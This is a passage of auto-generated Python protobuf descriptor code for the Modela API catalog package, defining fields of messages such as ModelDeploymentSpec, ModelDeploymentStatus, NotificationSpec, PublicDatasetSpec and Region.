full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='modelName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.modelName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modelVersion', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.modelVersion', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='maxTraffic', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.maxTraffic', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.traffic', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='canary', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.canary', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shadow', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.shadow', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='released', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.released', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deployed', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.deployed', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mountTar', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.mountTar', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='trafficSelector', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.trafficSelector', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='canaryMetrics', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.canaryMetrics', index=10,
number=11, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=4042,
serialized_end=4275,
)
_MODELDEPLOYMENTSTATUS = _descriptor.Descriptor(
name='ModelDeploymentStatus',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='imageName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.imageName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deploymentRef', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.deploymentRef', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='serviceRef', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.serviceRef', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hpaName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.hpaName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current95', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.current95', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current99', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.current99', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lastPredictionTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.lastPredictionTime', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dailyPredictionAvg', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.dailyPredictionAvg', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lastFailure', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.lastFailure', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='phase', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.phase', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deployedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.deployedAt', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='releasedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.releasedAt', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='trainingDatasetName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.trainingDatasetName', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='approvedBy', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.approvedBy', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='approvedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.approvedAt', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=4278,
serialized_end=4869,
)
_NOTIFICATIONSPEC_SELECTORENTRY = _descriptor.Descriptor(
name='SelectorEntry',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5095,
serialized_end=5142,
)
_NOTIFICATIONSPEC = _descriptor.Descriptor(
name='NotificationSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='onError', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.onError', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='errorTTL', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.errorTTL', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='onSuccess', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.onSuccess', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='successTTL', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.successTTL', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='notifierName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.notifierName', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='selector', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.selector', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_NOTIFICATIONSPEC_SELECTORENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=4872,
serialized_end=5142,
)
_PRCURVE = _descriptor.Descriptor(
name='PRCurve',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='values', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve.values', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5144,
serialized_end=5238,
)
_PRETRAINEDMODEL = _descriptor.Descriptor(
name='PretrainedModel',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5241,
serialized_end=5418,
)
_PRETRAINEDMODELLIST = _descriptor.Descriptor(
name='PretrainedModelList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5421,
serialized_end=5597,
)
_PRETRAINEDMODELSPEC = _descriptor.Descriptor(
name='PretrainedModelSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='image', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec.image', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5599,
serialized_end=5635,
)
_PUBLICDATASET = _descriptor.Descriptor(
name='PublicDataset',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5638,
serialized_end=5811,
)
_PUBLICDATASETLIST = _descriptor.Descriptor(
name='PublicDatasetList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5814,
serialized_end=5986,
)
_PUBLICDATASETSPEC = _descriptor.Descriptor(
name='PublicDatasetSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.url', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.description', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='task', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.task', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='openmlID', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.openmlID', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataUrl', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.dataUrl', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='citation', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.citation', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rows', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.rows', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='columns', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.columns', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fileSize', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.fileSize', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='targetColumn', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.targetColumn', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='industry', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.industry', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='imbalanced', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.imbalanced', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasourceCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.datasourceCR', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasetCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.datasetCR', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='studyCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.studyCR', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataProductCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.dataProductCR', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5989,
serialized_end=6299,
)
_REGION = _descriptor.Descriptor(
name='Region',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultDatacenterName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.defaultDatacenterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='location', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.location', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
